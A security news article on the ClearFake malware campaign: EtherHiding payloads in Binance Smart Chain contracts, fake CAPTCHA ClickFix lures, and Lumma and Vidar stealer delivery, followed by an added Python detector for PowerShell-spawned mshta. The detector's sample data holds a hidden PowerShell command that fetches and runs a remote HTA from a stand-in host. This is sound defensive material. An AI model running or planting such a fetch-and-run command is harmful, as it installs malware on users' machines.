The latest version of the “ClearFake” malware family exploits Web3 capabilities to load malicious scripts, resources and payloads from smart contracts on the blockchain.
Sekoia.io explained in a blog post how the ClearFake malware leverages compromised websites, mainly WordPress sites, to spread infostealers using the social engineering technique known as ClickFix. The hijacked websites are made to display a fake error page along with instructions for the user to copy and paste a malicious PowerShell script into their Windows terminal.
The ClearFake campaign was first spotted in July 2023 and previously used fake web browser download pages to trick users into installing fake browser updates; the threat actors began using ClickFix around May 2024, according to Sekoia.io.
By July 2024, websites compromised by ClearFake had been visited by about 200,000 unique users, Sekoia.io reports.
EtherHiding method stores malicious files on the blockchain
In the latest iteration of the ClearFake campaign, which began in December 2024, the phishing lure has been updated to include fake CAPTCHA pages and the JavaScript framework. Additionally, threat actors have begun using the Binance Smart Chain to retrieve various files, including the ClickFix PowerShell payload.
The Binance Smart Chain is a blockchain platform with smart contract functionality; smart contracts are self-executing digital contracts designed to facilitate transactions on the blockchain.
In the case of ClearFake, the smart contracts are used as storage for resources used in the malware campaign, with these files being stored in the “Input Data” field of the contracts.
The initial JavaScript code that is executed when a user visits a ClearFake-compromised website loads the Application Binary Interfaces (ABIs) needed to interact with the smart contracts tied to the attackers' Ethereum wallets.
ABIs define functions, objects and structures that dictate how an application should interact with a smart contract: in this case, the functions allow for the retrieval and execution of the necessary code from the smart contracts.
ClearFake loads additional JavaScript, ABIs, and the URL to the encrypted ClickFix lure HTML, as well as the AES key needed to decrypt it, from three different wallets throughout the attack chain. Some of the JavaScript code loaded collects the system, browser and cookie information from the user. The encrypted ClickFix HTML code is typically hosted on Cloudflare Pages, according to Sekoia.io.
This technique, known as EtherHiding, was previously used by ClearFake at a smaller scale. In October 2023, ClearFake was observed retrieving a single malicious JavaScript file from one of its Ethereum addresses.
EtherHiding not only aids threat actors in evading traditional detection methods but also ensures that the malicious files are permanently stored on the blockchain.
ClickFix social engineering leads to infostealer deployment
The fake CAPTCHA lures recently used by ClearFake imitate either a Cloudflare Turnstile page or a reCAPTCHA page.
The Cloudflare Turnstile imitation page displays the ClickFix prompt after two attempts to complete the verification process, claiming there is “unusual web traffic” requiring the user to execute the PowerShell commands copied to their clipboard.
The reCAPTCHA imitation displays a realistic prompt asking the user to select images containing a car, after which a “DNS error” message is displayed along with the ClickFix instructions.
The PowerShell commands lead to execution of Mshta.exe, which retrieves and runs JavaScript from a remote server that ultimately leads to the installation of Emmenhtal Loader and deployment of Lumma Stealer. ClearFake has also been observed spreading Vidar Stealer via a basic PowerShell loader since January 2025.
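As an added defender-side example, not code from Sekoia.io or this article: a Python check over constructed Sysmon-style process-creation events that flags the chain described above, a pasted PowerShell command spawning mshta.exe with a remote URL. The parent-process relationships, file paths and the lure.example host are assumptions made for the sample data.

```python
import re

# Constructed Sysmon Event ID 1 (process creation) style events; not real telemetry.
# Events 0 and 1 model the ClickFix chain, events 2 and 3 are benign look-alikes.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "mshta http://lure.example/verify.hta"'},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://lure.example/verify.hta"},
    {"ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta C:\Program Files\Vendor\setup.hta"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\Scripts\inventory.ps1"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)


def exe_name(path):
    """Basename of a Windows image path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def clickfix_indicators(ev):
    """Return the list of ClickFix-chain indicators matched by one event."""
    image, parent = exe_name(ev["Image"]), exe_name(ev["ParentImage"])
    cmd = ev["CommandLine"].lower()
    hits = []
    if image == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_url")          # mshta fetching its script remotely
    if image == "mshta.exe" and parent == "powershell.exe":
        hits.append("mshta_from_powershell")     # mshta spawned by the pasted command
    if image == "powershell.exe" and "mshta" in cmd and URL_RE.search(cmd):
        hits.append("powershell_launches_mshta_url")  # the pasted PowerShell itself
    return hits


def flag_events(events):
    """Map each suspicious event's command line to its matched indicators."""
    flagged = {}
    for ev in events:
        hits = clickfix_indicators(ev)
        if hits:
            flagged[ev["CommandLine"]] = hits
    return flagged


if __name__ == "__main__":
    for cmd, hits in flag_events(SAMPLE_EVENTS).items():
        print(hits, cmd)
```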
Using the wallet addresses involved in the campaign as indicators of compromise, Sekoia.io analysts were able to scan for compromised websites on Censys and discovered more than 9,300 such sites as of February 24, 2025.
The Sekoia.io researchers noted that the recent ClearFake developments, including the expanded EtherHiding method, were previously described by researcher Marek Szustak in a January 2025 blog post.